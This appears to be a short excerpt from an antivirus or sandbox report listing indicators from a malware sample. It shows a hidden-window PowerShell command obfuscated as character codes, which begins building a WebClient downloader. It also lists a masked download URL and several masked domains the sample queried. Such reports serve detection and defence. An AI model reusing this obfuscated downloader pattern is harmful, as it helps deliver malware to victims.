Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( ( 36, 75 ,83 , 116 ,61 ,110 , 101 ,119,45 , 111, 98, 106 , 101 ,99, 116,32 , 78,101, 116,46 ,87, 101 , 98,67 , 108 , 105, 101,110,116, 59 ,36 ,82 ,89, 122 , 61,39, 104,116 , 116 , 112 , 58, ...
- 'di####lstory.tech':80
- http://www.di####lstory.tech/wp-content/eq8f1jP8/
- DNS ASK be##.webline.ge
- DNS ASK pe######.#####.####.log.security.cod.issue.fondue-at-the-fountain.com
- DNS ASK st##e.co.uk
- DNS ASK di####lstory.tech
- DNS ASK do##snea.ro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( ( 36, 75 ,83 , 116 ,61 ,110 , 101 ,119,45 , 111, 98, 106 , 101 ,99, 116,32 , 78,101, 116,46 ,87, 101 , 98,67 , 108 , 105, 101,110,116, 59 ,36 ,82 ,89, 122 , 61,39, 104,116 , 116 , 112 , 58, ...' (with hidden window)